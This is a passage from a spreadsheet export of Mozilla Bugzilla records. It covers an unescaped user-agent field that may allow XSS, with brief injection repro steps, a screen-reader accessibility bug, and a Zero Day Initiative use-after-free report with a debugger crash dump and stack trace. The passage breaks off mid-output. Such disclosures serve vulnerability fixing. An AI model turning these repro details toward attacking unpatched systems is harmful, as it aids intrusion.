          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2861" t="inlineStr">
        <is>
          <t>2.17.1</t>
        </is>
      </c>
      <c r="L2861" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2861" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2861" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2861" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2861" t="inlineStr">
        <is>
          <t>[ready for all branches]</t>
        </is>
      </c>
      <c r="Q2861" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2861" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2861" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T2861" t="n">
        <v>1</v>
      </c>
      <c r="U2861" t="n">
        <v>0</v>
      </c>
      <c r="V2861" t="n">
        <v>21</v>
      </c>
      <c r="W2861" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; ja; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Build Identifier: 
At "Enter A Bug" page for Firefox,
Default value of Build Identifier is User Agent text.
But It is not HTML Escaped.
Reproducible: Always
Steps to Reproduce:
1.Chagnge User Agent text to contain "&gt; 
  At Firefox, open about:config , and change general.useragent.extra.firefox to
  Firefox"&gt;/2.0.0.4
2.Open https://bugzilla.mozilla.org/enter_bug.cgi?product=Firefox&amp;format=guided
3.Check Build Identifier text
3.
Actual Results:  
It is not HTML Escaped.
Expected Results:  
It should be HTML escaped.
I don't know this bug is XSS vulnerability or not.
I this bug is not XSS vulnerability, there is no reason to keep Security flag on.</t>
        </is>
      </c>
      <c r="X2861" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2862">
      <c r="A2862" t="n">
        <v>431615</v>
      </c>
      <c r="B2862" t="inlineStr">
        <is>
          <t>2008-04-30 18:32:26 -0700</t>
        </is>
      </c>
      <c r="C2862" t="inlineStr">
        <is>
          <t>HTML 4.01 MAP element prevents links from displaying using a screen reader</t>
        </is>
      </c>
      <c r="D2862" t="inlineStr">
        <is>
          <t>2008-09-02 08:44:07 -0700</t>
        </is>
      </c>
      <c r="E2862" t="n">
        <v>1</v>
      </c>
      <c r="F2862" t="n">
        <v>1</v>
      </c>
      <c r="G2862" t="n">
        <v>3</v>
      </c>
      <c r="H2862" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2862" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2862" t="inlineStr">
        <is>
          <t>Disability Access APIs</t>
        </is>
      </c>
      <c r="K2862" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2862" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2862" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2862" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2862" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2862" t="inlineStr"/>
      <c r="Q2862" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2862" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2862" t="inlineStr">
        <is>
          <t>mozilla1.9.1a1</t>
        </is>
      </c>
      <c r="T2862" t="n">
        <v>1</v>
      </c>
      <c r="U2862" t="n">
        <v>0</v>
      </c>
      <c r="V2862" t="n">
        <v>18</v>
      </c>
      <c r="W2862" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
I've been using the "HTML 4.01 MAP element to group links, then identifying the group with the "title" attribute". This is a suggested AAA W3C WCAG 1.0 accessibility technique under checkpoint 13.6
www.w3.org/TR/WCAG10-HTML-TECHS/#group-bypass
WCAG 2.0, released today as a Candidate Recommendation, also suggests the MAP element as one technique that can be used to group links.
www.w3.org/TR/2004/WD-WCAG20-HTML-TECHS-20041119/#linkgroups
However, the map element seems to be affected when a screen reader virtualises the page in Firefox.
Using Firefox 2 with Jaws 9 on Windows XP, all the navigation links were missing from the virtual buffer. Turning the virtual cursor off, the user could tab between all the links (including the missing ones). A similar problem was encountered with Window Eyes.  
After deleting the map element from the markup all the links were visible (audible/feelable) with Firefox/Jaws. 
A test page demonstrating the bug is available at:
www.e-bility.com/braillespace/bwp/test.php
and the same page (now without map element) is at:
www.braillespace.com
The problem has also been reported to Freedom Scientific (via the JAWS Beta List) and GW Micro by email.
Thanks for your help and the great work you are doing with Firefox.
Reproducible: Always
Steps to Reproduce:
1. Go to test page above using JAWS or Window Eyes
2.
3.
Actual Results:  
Using the map element to group related links results in none of the links being available to a screen reader. They are not even aware that there are links on the page. However the links are available if the web page is viewed in Internet Explorer. Removing the map element from the mark-up fixes the problem.
Expected Results:  
The links should be visible and the map element title should indicate that they are related, e.g. that all links belong to the "Main navigation" or "Section navigation" etc.
Because it is a recommended W3C technique used to enhance accessibility it is likely to be most prevalent on websites for this audience. The technique is also most likely to be used for important link groups, such as navigation areas. However, any site using the map element will mean it cannot be navigated by a screen reader in Firefox.</t>
        </is>
      </c>
      <c r="X2862" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2863">
      <c r="A2863" t="n">
        <v>1249377</v>
      </c>
      <c r="B2863" t="inlineStr">
        <is>
          <t>2016-02-18 11:32:01 -0800</t>
        </is>
      </c>
      <c r="C2863" t="inlineStr">
        <is>
          <t>ZDI-CAN-3574: nsHTMLDocument SetBody Use-After-Free RCE</t>
        </is>
      </c>
      <c r="D2863" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E2863" t="n">
        <v>1</v>
      </c>
      <c r="F2863" t="n">
        <v>1</v>
      </c>
      <c r="G2863" t="n">
        <v>3</v>
      </c>
      <c r="H2863" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2863" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2863" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2863" t="inlineStr">
        <is>
          <t>20 Branch</t>
        </is>
      </c>
      <c r="L2863" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2863" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2863" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2863" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2863" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+] dom-triaged btpp-fixnow</t>
        </is>
      </c>
      <c r="Q2863" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2863" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2863" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T2863" t="n">
        <v>1</v>
      </c>
      <c r="U2863" t="n">
        <v>0</v>
      </c>
      <c r="V2863" t="n">
        <v>32</v>
      </c>
      <c r="W2863" t="inlineStr">
        <is>
          <t>Created attachment 8720912
Crashing testcase (PoC)
HP's Zero Day Initiative has identified a vulnerability affecting the following products:
  Mozilla Firefox
-- VULNERABILITY DETAILS ------------------------
Tested against Firefox on Windows 8.1 32-bit
```
[JavaScript Warning: "Successfully compiled asm.js code (total compilation time 1ms; not stored in cache (too small to benefit))" {file: "http://172.16.208.3/uaf.html" line: 0}]
[JavaScript Error: "The character encoding of the HTML document was not declared. The document will render with garbled text in some browser configurations if the document contains characters from outside the US-ASCII range. The character encoding of the page must be declared in the document or in the transfer protocol." {file: "http://172.16.208.3/uaf.html" line: 0}]
[JavaScript Error: "TelemetryStopwatch: key "FX_PAGE_LOAD_MS" was already initialized" {file: "resource://gre/modules/TelemetryStopwatch.jsm" line: 52}]
[JavaScript Error: "NS_ERROR_NOT_AVAILABLE: prompt aborted by user" {file: "resource://gre/components/nsPrompter.js" line: 431}]
[JavaScript Error: "uncaught exception: out of memory" {file: "http://172.16.208.3/uaf.html" line: 98}]
(2d8.43c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00070006 ebx=00028410 ecx=0017c560 edx=00028544 esi=70d68518 edi=70d40000
eip=222201d1 esp=0017c558 ebp=00005245 iopl=0         nv up ei ng nz na pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210287
222201d1 813c0757696e45  cmp     dword ptr [edi+eax],456E6957h ds:0023:70db0006=????????
0:000&gt; kv
ChildEBP RetAddr  Args to Child              
WARNING: Frame IP not in any known module. Following frames may be wrong.
0017c564 61109f1a 00000002 171e6940 14469240 0x222201d1
0017c580 60fdbad1 00000000 00000000 0017c790 xul!IsAllowedAsChild+0x4a (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\base\nsinode.cpp @ 1759]
0017c590 60fda05b 00000000 14469240 00000000 xul!nsINode::EnsurePreInsertionValidity2+0x19 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\base\nsinode.cpp @ 1910]
0017c790 61eeefdd 00000000 14469240 00000000 xul!nsINode::ReplaceOrInsertBefore+0x9f (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\base\nsinode.cpp @ 1977]
0017c7b8 61dc7a93 14469240 0017c7d8 0017c938 xul!nsHTMLDocument::SetBody+0x82 (FPO: [2,2,4]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\html\nshtmldocument.cpp @ 1055]
0017c7e8 6107fc75 103195f0 0017c828 42710000 xul!mozilla::dom::HTMLDocumentBinding::set_body+0xd0 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\dom\bindings\htmldocumentbinding.cpp @ 201]
0017c834 60efe92c 103195f0 00000001 42710000 xul!mozilla::dom::GenericBindingSetter+0xe8 (FPO: [3,10,0]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\bindings\bindingutils.cpp @ 2642]
0017c8cc 60e82040 00000000 0017cc40 0017ca78 xul!js::Invoke+0xbc (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\vm\interpreter.cpp @ 489]
0017c970 60e7acda 0017c9b0 00000001 0017ca78 xul!js::Invoke+0x1c0 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\vm\interpreter.cpp @ 542]
0017c9e8 60e7a73d 0017cb08 0017cf00 0017ca78 xul!SetExistingProperty+0x1b9 (FPO: [6,21,0]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\vm\nativeobject.cpp @ 2278]
0017ca9c 60e7a3d8 0017cb08 0017cf00 0017cc90 xul!js::NativeSetProperty+0x2ad (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\vm\nativeobject.cpp @ 2312]
0017cad8 611d5dca 0017cb08 0017cf00 0017cc90 xul!js::SetProperty+0x35 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\vm\nativeobject.h @ 1453]
0017cb94 611d466c 103195f0 0017ccc4 0017cf00 xul!js::SetPropertyIgnoringNamedGetter+0x7e (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\proxy\baseproxyhandler.cpp @ 136]
0017cbe8 611d459f 103195f0 0017ccc4 0017cf00 xul!mozilla::dom::DOMProxyHandler::set+0x81 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\bindings\domjsproxyhandler.cpp @ 218]
0017cc48 611d44b8 0017ccc4 0017cf00 0017cc90 xul!js::Proxy::set+0xe2 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\proxy\proxy.cpp @ 345]
0017cc60 611d440d 103195f0 0017ccc4 0017cf00 xul!js::proxy_SetProperty+0x1a (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\proxy\proxy.cpp @ 606]
0017cca0 60e861b0 0017ccc4 0017cf00 0017cd18 xul!JSObject::nonNativeSetProperty+0x53 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\jsobj.cpp @ 1046]
0017ccc8 60e87aa6 103195f0 0017ce1c 0017cf00 xul!js::DirectProxyHandler::set+0x81 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\proxy\directproxyhandler.cpp @ 241]
0017cd20 611d459f 103195f0 0017ce1c 0017cf00 xul!js::CrossCompartmentWrapper::set+0xa5 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\proxy\crosscompartmentwrapper.cpp @ 181]
0017cd80 611d44b8 0017ce1c 0017cf00 0017cdd0 xul!js::Proxy::set+0xe2 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\proxy\proxy.cpp @ 345]
0017cd98 60e7a432 103195f0 0017ce1c 0017cf00 xul!js::proxy_SetProperty+0x1a (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\proxy\proxy.cpp @ 606]
0017cdd8 60e7a33a 0017ce1c 0017cf00 0c0560b0 xul!js::SetProperty+0x8f (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\vm\nativeobject.h @ 1452]
0017ce2c 60eb3dfd 0c0560a8 0017cf00 0c0560b0 xul!SetPropertyOperation+0x92 (FPO: [3,12,0]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\vm\interpreter.cpp @ 313]
0017dad0 61465216 09d508cc 62a31130 0017db90 xul!Interpret+0x11dd (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\vm\interpreter.cpp @ 2601]
0017db10 60efe976 103195f0 0017db80 ffffff88 xul!js::RunScript+0x1b6 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\vm\interpreter.cpp @ 430]
0017dba4 60fe344d 00000000 103195f0 0017df30 xul!js::Invoke+0x106 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\vm\interpreter.cpp @ 510]
0017dc6c 60fb775c 0017dd70 0017dcc8 0017dca8 xul!JS::Call+0x17f (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\jsapi.cpp @ 2965]
0017dd34 60fb762e 103195f0 0017dd70 162d6970 xul!mozilla::dom::EventHandlerNonNull::Call+0xf0 (FPO: [5,42,0]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\dom\bindings\eventhandlerbinding.cpp @ 260]
0017dea4 60fb7bf5 171c2d48 162d6970 0017df18 xul!mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports *&gt;+0x95 (FPO: [7,82,0]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\dist\include\mozilla\dom\eventhandlerbinding.h @ 351]
0017e0b0 60e25099 171c2d40 162d6970 0017e43c xul!mozilla::JSEventHandler::HandleEvent+0x141 (FPO: [Non-Fpo]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\events\jseventhandler.cpp @ 216]
0017e324 60e23b8b 144df800 0017e4b0 0017e444 xul!mozilla::EventListenerManager::HandleEventInternal+0x339 (FPO: [5,150,0]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\events\eventlistenermanager.cpp @ 1156]
0017e388 60fd5c40 00000000 0017e430 13aa44f8 xul!mozilla::EventTargetChainItem::HandleEventTargetChain+0x19b (FPO: [2,15,0]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\events\eventdispatcher.cpp @ 317]
0017e45c 60fb4582 0017e4b0 00000000 0017e4a4 xul!mozilla::EventDispatcher::Dispatch+0x5c0 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\events\eventdispatcher.cpp @ 655]
0017e510 60fabdaa 1717e5e0 00000000 fffdffef xul!nsDocumentViewer::LoadComplete+0x26e (FPO: [Non-Fpo]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\layout\base\nsdocumentviewer.cpp @ 1001]
0017e878 60fabb56 13aa4414 1783982c 00000000 xul!nsDocShell::EndPageLoad+0xfb (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\docshell\base\nsdocshell.cpp @ 7418]
0017e89c 6114dfb0 15ce21c8 60f95904 17839800 xul!nsDocShell::OnStateChange+0xed (FPO: [5,0,0]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\docshell\base\nsdocshell.cpp @ 7224]
0017e8c0 6121177e 13aa4800 13aa4400 0017e98c xul!nsStandardURL::SchemeIs+0x2c (FPO: [3,0,4]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\netwerk\base\nsstandardurl.cpp @ 1878]
0017e960 61212e35 13aa4414 1783982c 13aa4518 xul!nsSecureBrowserUIImpl::OnStateChange+0x4b9 (FPO: [5,17,0]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\security\manager\ssl\nssecurebrowseruiimpl.cpp @ 1176]
0017e9fc 612132e2 00000001 15010160 13aa4404 xul!nsDocLoader::doStopDocumentLoad+0x73 (FPO: [2,16,4]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\uriloader\base\nsdocloader.cpp @ 831]
0017ead4 6120f4dd 15010180 612107e1 15010160 xul!nsDocLoader::OnStopRequest+0x128 (FPO: [4,27,0]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\uriloader\base\nsdocloader.cpp @ 609]
0017eaf0 61210534 15010180 629864f8 0017eb44 xul!nsLoadGroup::AddRef+0xd (FPO: [1,0,0]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\netwerk\base\nsloadgroup.cpp @ 159]
0017eb00 6113c461 15010160 629864f8 0017eb44 xul!nsLoadGroup::QueryInterface+0x14 (FPO: [3,0,0]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\netwerk\base\nsloadgroup.cpp @ 159]
0017eb10 6113c428 13b5fd10 629864f8 0017eb44 xul!nsWeakReference::QueryReferent+0x18 (FPO: [3,0,0]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\xpcom\glue\nsweakreference.cpp @ 123]
0017eb2c 60fd7f64 fb4dc964 62988b48 0017eb64 xul!nsQueryReferent::operator()+0x18 (FPO: [1,0,4]) (CONV: fastcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\xpcom\glue\nsweakreference.cpp @ 56]
0017eb64 60e159e5 00000000 0f1ec800 1783a800 xul!nsIDocument::GetDocumentLoadGroup+0x2c (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\base\nsidocument.h @ 332]
0017eb80 60e18627 60e1863b 00000001 01c41240 xul!nsDocument::UnblockOnload+0x74 (FPO: [1,0,0]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\base\nsdocument.cpp @ 9046]
0017ebd8 60e1c19c 60fd07a9 42725640 0017eec8 xul!nsDocument::DispatchContentLoadedEvents+0x101 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\base\nsdocument.cpp @ 5179]
0017ebdc 60fd07a9 42725640 0017eec8 01c41240 xul!nsRunnableMethodImpl&lt;void (__thiscall mozilla::dom::XULDocument::*)(void),1&gt;::Run+0x15 (FPO: [1,0,0]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\dist\include\nsthreadutils.h @ 872]
0017ecec 6111324a 01c41240 00000000 0017ed0f xul!nsThread::ProcessNextEvent+0x633 (FPO: [Non-Fpo]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\xpcom\threads\nsthread.cpp @ 964]
0017ed10 61131586 629c93b0 00000000 00000000 xul!NS_ProcessPendingEvents+0x24 (FPO: [0,2,4]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\xpcom\glue\nsthreadutils.cpp @ 239]
0017ed40 6112eea8 00000200 000c022e 0f438c00 xul!nsWindow::DispatchPendingEvents+0x35 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\widget\windows\nswindow.cpp @ 3944]
0017ee88 61112bd4 00000200 0017eec4 0017eec8 xul!nsWindow::ProcessMessage+0x6e5 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\widget\windows\nswindow.cpp @ 5302]
0017eeb4 61112b1c 0f438c00 01000200 00000000 xul!nsWindow::WindowProcInternal+0xab (FPO: [Non-Fpo]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\widget\windows\nswindow.cpp @ 4583]
0017eef4 61112af6 61112b29 000c022e 00000200 xul!CallWindowProcCrashProtected+0x1f (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\xpcom\base\nscrashonexception.cpp @ 35]
0017ef10 76e28aa0 000c022e 00000200 00000000 xul!nsWindow::WindowProc+0x2d (FPO: [Non-Fpo]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\widget\windows\nswindow.cpp @ 4535]
0017ef3c 76e28c71 61112ac9 000c022e 00000200 USER32!_InternalCallWinProc+0x2b
0017efc0 76e28d47 000c022e 00000200 00000000 USER32!UserCallWinProcCheckWow+0x13e (FPO: [Non-Fpo])
0017f028 76e28a70 1922213b 0017f090 60fcf82d USER32!DispatchMessageWorker+0x41c (FPO: [Non-Fpo])
0017f034 60fcf82d 0017f074 01c1c404 00000000 USER32!DispatchMessageW+0x10 (FPO: [Non-Fpo])
0017f090 60fcfc4c 00000000 01c1c404 0017f1c4 xul!nsAppShell::ProcessNextNativeEvent+0x1a3 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\widget\windows\nsappshell.cpp @ 373]
0017f0ac 60fd0440 00000000 0000000a 00000000 xul!nsBaseAppShell::OnProcessNextEvent+0x8f (FPO: [3,1,0]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\widget\nsbaseappshell.cpp @ 271]
0017f1c4 60fcf4b7 01c41240 00000000 0017f1fc xul!nsThread::ProcessNextEvent+0x2ca (FPO: [Non-Fpo]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\xpcom\threads\nsthread.cpp @ 936]
0017f1f4 60fceb81 01c53301 fb4dd1ec 01c1c400 xul!mozilla::ipc::MessagePump::Run+0x5f (FPO: [1,4,0]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\ipc\glue\messagepump.cpp @ 95]
0017f22c 60fcebbc 01c41240 00000001 60f7d800 xul!MessageLoop::RunHandler+0x20 (FPO: [SEH]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\ipc\chromium\src\base\message_loop.cc @ 228]
0017f24c 60fcfb59 09d95840 00000000 60fcfa37 xul!MessageLoop::Run+0x19 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\ipc\chromium\src\base\message_loop.cc @ 202]
0017f258 60fcfa37 01c1c400 09d95840 612388d7 xul!nsBaseAppShell::Run+0x32 (FPO: [1,0,0]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\widget\nsbaseappshell.cpp @ 158]
0017f264 612388d7 01c1c400 63caa5a0 0edc6300 xul!nsAppShell::Run+0x1b (FPO: [1,0,4]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\widget\windows\nsappshell.cpp @ 257]
0017f274 611683b3 09d95840 0017f4f0 0017f4d8 xul!nsAppStartup::Run+0x20 (FPO: [1,0,0]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\toolkit\components\startup\nsappstartup.cpp @ 282]
0017f460 61168550 00000001 0017f620 0017f5d8 xul!XREMain::XRE_mainRun+0x4c7 (FPO: [0,117,0]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\toolkit\xre\nsapprunner.cpp @ 4298]
0017f47c 6116a5fc 00000000 01812ff8 0017f600 xul!XREMain::XRE_main+0x122 (FPO: [3,2,0]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\toolkit\xre\nsapprunner.cpp @ 4391]
0017f5d8 01281675 00000001 01812ff8 0017f620 xul!XRE_main+0x3e (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\toolkit\xre\nsapprunner.cpp @ 4494]
0017f76c 01281312 01c1c0a0 01816ff8 ffffc000 firefox!do_main+0x125 (FPO: [1,92,0]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\browser\app\nsbrowserapp.cpp @ 212]
0017f810 012810dc 012824eb 012824eb 0017f86c firefox!NS_internal_main+0x122 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\browser\app\nsbrowserapp.cpp @ 354]
0017f824 0128246e 01812ff8 013cbf98 013cdf70 firefox!wmain+0xbc (FPO: [2,0,0]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\toolkit\xre\nswindowswmain.cpp @ 138]
0017f86c 76864198 7f547000 76864170 c43a910b firefox!__tmainCRTStartup+0xfe (FPO: [Non-Fpo]) (CONV: cdecl) [f:\dd\vctools\crt\crtw32\startup\crt0.c @ 255]
0017f880 77222cb1 7f547000 5941fe22 00000000 KERNEL32!BaseThreadInitThunk+0x24 (FPO: [Non-Fpo])
0017f8c8 77222c7f ffffffff 7724e744 00000000 ntdll!LdrRemoveLoadAsDataTable+0x191
0017f8d8 00000000 012824eb 7f547000 00000000 ntdll!LdrRemoveLoadAsDataTable+0x15f
0:000&gt; !lmi xul
Loaded Module Info: [xul]
         Module: xul
   Base Address: 60da0000
     Image Name: C:\Program Files\Mozilla Firefox\xul.dll
   Machine Type: 332 (I386)
     Time Stamp: 56b55a4f Fri Feb 05 18:28:31 2016
           Size: 25b1000
       CheckSum: 250ec9d
Characteristics: 2122  
Debug Data Dirs: Type  Size     VA  Pointer
             CODEVIEW    76, 1f11818, 1f10618 RSDS - GUID: {38E42F42-A4D0-489D-8C1F-967BEADFCA64}
               Age: 2, Pdb: c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\toolkit\library\xul.pdb
                   ??    14, 1f11890, 1f10690 [Data not mapped]
                CLSID     4, 1f118a4, 1f106a4 [Data not mapped]
     Image Type: FILE     - Image read successfully from debugger.
                 C:\Program Files\Mozilla Firefox\xul.dll
    Symbol Type: PDB      - Symbols loaded successfully from image path.
                 z:\export\symbols\xul.pdb\38E42F42A4D0489D8C1F967BEADFCA642\xul.pdb
       Compiler: Linker - front end [0.0 bld 0] - back end [12.0 bld 30723]
    Load Report: private symbols &amp; lines, source indexed
                 z:\export\symbols\xul.pdb\38E42F42A4D0489D8C1F967BEADFCA642\xul.pdb
0:000&gt; lmvm xul
start    end        module name
